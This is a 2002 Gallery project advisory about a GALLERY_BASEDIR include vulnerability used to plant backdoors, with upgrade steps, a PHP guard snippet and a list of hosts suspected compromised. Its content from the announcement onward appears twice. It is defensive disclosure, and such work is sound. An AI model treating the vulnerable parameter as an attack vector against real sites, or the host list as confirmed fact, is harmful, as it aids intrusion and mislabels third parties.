Random Image
Security vulnerability in Gallery 1.1, 1.2.x, 1.3
Submitted by bharat on Thu, 2002-08-01 04:44
An alert system administrator for PowerTech an ISP in Norway discovered a security vulnerability in Gallery yesterday. This security hole is a serious one; with it a malicious user can install a backdoor on your system and gain shell access with the same privileges as your webserver user. It's important that you realize that there are malicious people exploiting this bug *right* *now*. Read through to the bottom of this email for a list of IP addresses of sites that we believe may already be hacked, and ways to detect if you've been hacked.
We resolved this security issue within a day. However, since we are right about to release Gallery v1.3.1 we are holding off on publishing the final v1.3.1 with the fix until we're sure that the release is stable. The target release date for v1.3.1 (with the security fix) is Friday 8/2/2002.
______________________________
VULNERABLE VERSIONS OF GALLERY
This security hole affects every version of Gallery since v1.1 (which was released on 7/5/2001). If you have version 1.1 or newer you should upgrade to the latest build of v1.3.1.
_________
UPGRADING
In the meantime, if you would like you can upgrade to our latest build which is a release candidate and is very stable. You have two choices for upgrading.
1. If you are using Gallery from CVS, you can simply get the
latest code from cvs:
% cd gallery
% sh configure.sh
% cvs update
% sh secure.sh
2. If you are using an official release, you can download a daily snapshot with the fix from:
http://jpmullan.com/galleryupdates
You should download the newest version (1.3.1-cvs-b11 or better).
You can get help on upgrading here:
http://gallery.sourceforge.net/help.php
We really want to help you through this process, but a flood of people sending email to the mailing list after having problems without reading the README/UPGRADING documents will probably not be well received. Please be considerate of our time and do at least a *little* reading before you dive in :-)
_____________________
PATCHING YOUR GALLERY
An alternative to doing a full upgrade is to patch the files that contain the security fix. This is relatively easy to do. All you need to do is edit these files:
captionator.php
errors/configmode.php
errors/needinit.php
errors/reconfigure.php
errors/unconfigured.php
and put these lines at the top of the file:
// Hack prevention.
if (!empty($HTTP_GET_VARS["GALLERY_BASEDIR"]) ||
!empty($HTTP_POST_VARS["GALLERY_BASEDIR"]) ||
!empty($HTTP_COOKIE_VARS["GALLERY_BASEDIR"])) {
print "Security violation\n";
exit;
}
?>
If you are concerned or have doubts, it is also ok to simply rename or delete these files as a temporary measure until the official release is available. If your gallery is configured properly you should not need these files.
________________________
POTENTIALLY HACKED HOSTS
The hackers used Gallery to install a backdoor program on target systems. chkrootkit is a good resource for checking to see if your system has been hacked.
Also, I was provided with a list of other sites that had downloaded this backdoor program. It's entirely possible that these sites have also been hacked. If your site is on this list, you should take it seriously.
62.100.56.4 harry.icmc.nl
62.129.136.116
62.250.6.51 www2.funprice.nl
64.28.22.35 intoxicated.tuxheaven.net
66.126.147.202 monet.wistful.net
129.241.200.24 samson.item.ntnu.no
129.241.56.64 textus2.stud.ntnu.no
130.89.166.178 wit389108.student.utwente.nl
141.84.103.49 alf.iuk.bwl.uni-muenchen.de
148.81.186.99 witch.sggw.waw.pl
158.38.152.245 fjellseter.freidig.idrett.no
193.71.199.153 malibu.wideroe.net
194.204.189.203
194.248.129.19
194.97.39.189 belgarath.topnet.de
195.116.24.209 www.metronet.pl
195.159.29.200 privat.sysedata.no
195.205.44.97 thorin.pulsar.net.pl
195.70.35.31 blacksun.hu
204.152.149.251 hh-ce1.net.monmouth.edu
208.180.231.184 cdm-208-231-184-brcs.cox-internet.com
212.182.110.22 pc22.uhc.lublin.pl
212.204.238.60 patrick.makkers-internet.nl
212.71.138.15 snail.infocity.cz
213.139.94.202:
213.163.0.44 paloczp.vivendi.hu
213.241.3.145 www5.polbox.pl
213.84.124.55 altesco.xs4all.nl
213.84.38.128 orkz.xs4all.nl
217.110.252.109 agenda.kasserver.com
217.115.141.116 www.segelflug.de
217.115.192.3 s03.nxs.nl
217.160.88.2 taketoolbase.de
217.160.94.71 p15091059.pureserver.info
217.172.179.91 chicago091.server4free.de
217.8.137.158 c137158.catch.sdsl.no
217.97.225.10 vhost.v1.pl
We resolved this security issue within a day. However, since we are right about to release Gallery v1.3.1 we are holding off on publishing the final v1.3.1 with the fix until we're sure that the release is stable. The target release date for v1.3.1 (with the security fix) is Friday 8/2/2002.
______________________________
VULNERABLE VERSIONS OF GALLERY
This security hole affects every version of Gallery since v1.1 (which was released on 7/5/2001). If you have version 1.1 or newer you should upgrade to the latest build of v1.3.1.
_________
UPGRADING
In the meantime, if you would like you can upgrade to our latest build which is a release candidate and is very stable. You have two choices for upgrading.
1. If you are using Gallery from CVS, you can simply get the
latest code from cvs:
% cd gallery
% sh configure.sh
% cvs update
% sh secure.sh
2. If you are using an official release, you can download a daily snapshot with the fix from:
http://jpmullan.com/galleryupdates
You should download the newest version (1.3.1-cvs-b11 or better).
You can get help on upgrading here:
http://gallery.sourceforge.net/help.php
We really want to help you through this process, but a flood of people sending email to the mailing list after having problems without reading the README/UPGRADING documents will probably not be well received. Please be considerate of our time and do at least a *little* reading before you dive in :-)
_____________________
PATCHING YOUR GALLERY
An alternative to doing a full upgrade is to patch the files that contain the security fix. This is relatively easy to do. All you need to do is edit these files:
captionator.php
errors/configmode.php
errors/needinit.php
errors/reconfigure.php
errors/unconfigured.php
and put these lines at the top of the file:
// Hack prevention.
if (!empty($HTTP_GET_VARS["GALLERY_BASEDIR"]) ||
!empty($HTTP_POST_VARS["GALLERY_BASEDIR"]) ||
!empty($HTTP_COOKIE_VARS["GALLERY_BASEDIR"])) {
print "Security violation\n";
exit;
}
?>
If you are concerned or have doubts, it is also ok to simply rename or delete these files as a temporary measure until the official release is available. If your gallery is configured properly you should not need these files.
________________________
POTENTIALLY HACKED HOSTS
The hackers used Gallery to install a backdoor program on target systems. chkrootkit is a good resource for checking to see if your system has been hacked.
Also, I was provided with a list of other sites that had downloaded this backdoor program. It's entirely possible that these sites have also been hacked. If your site is on this list, you should take it seriously.
62.100.56.4 harry.icmc.nl
62.129.136.116
62.250.6.51 www2.funprice.nl
64.28.22.35 intoxicated.tuxheaven.net
66.126.147.202 monet.wistful.net
129.241.200.24 samson.item.ntnu.no
129.241.56.64 textus2.stud.ntnu.no
130.89.166.178 wit389108.student.utwente.nl
141.84.103.49 alf.iuk.bwl.uni-muenchen.de
148.81.186.99 witch.sggw.waw.pl
158.38.152.245 fjellseter.freidig.idrett.no
193.71.199.153 malibu.wideroe.net
194.204.189.203
194.248.129.19
194.97.39.189 belgarath.topnet.de
195.116.24.209 www.metronet.pl
195.159.29.200 privat.sysedata.no
195.205.44.97 thorin.pulsar.net.pl
195.70.35.31 blacksun.hu
204.152.149.251 hh-ce1.net.monmouth.edu
208.180.231.184 cdm-208-231-184-brcs.cox-internet.com
212.182.110.22 pc22.uhc.lublin.pl
212.204.238.60 patrick.makkers-internet.nl
212.71.138.15 snail.infocity.cz
213.139.94.202:
213.163.0.44 paloczp.vivendi.hu
213.241.3.145 www5.polbox.pl
213.84.124.55 altesco.xs4all.nl
213.84.38.128 orkz.xs4all.nl
217.110.252.109 agenda.kasserver.com
217.115.141.116 www.segelflug.de
217.115.192.3 s03.nxs.nl
217.160.88.2 taketoolbase.de
217.160.94.71 p15091059.pureserver.info
217.172.179.91 chicago091.server4free.de
217.8.137.158 c137158.catch.sdsl.no
217.97.225.10 vhost.v1.pl
